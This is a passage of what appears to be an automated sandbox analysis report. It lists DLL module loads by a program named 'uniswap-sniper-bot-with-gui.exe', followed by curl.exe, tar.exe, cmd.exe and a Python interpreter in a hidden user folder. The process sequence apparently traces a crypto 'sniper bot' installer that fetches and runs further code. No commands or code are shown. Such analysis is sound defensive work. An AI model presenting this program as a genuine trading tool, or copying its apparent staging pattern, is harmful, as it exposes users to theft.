Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: kbdus.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: windows.globalization.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: msspellcheckingfacility.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: directmanipulation.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mf.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mfplat.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: rtworkq.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: msmpeg2vdec.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mfperfhelper.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dxva2.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: msvproc.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dcomp.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tar.exe	Section loaded: archiveint.dll
Source: C:\Windows\System32\tar.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\tar.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mf.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mfplat.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: rtworkq.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: msmpeg2vdec.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mfperfhelper.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dxva2.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: msvproc.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: d3d12.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: d3d12.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: d3d12core.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dxilconv.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: d3dscache.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: python311.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: version.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: libcrypto-1_1.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: libssl-1_1.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: mswsock.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: python311.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: vcruntime140.dll
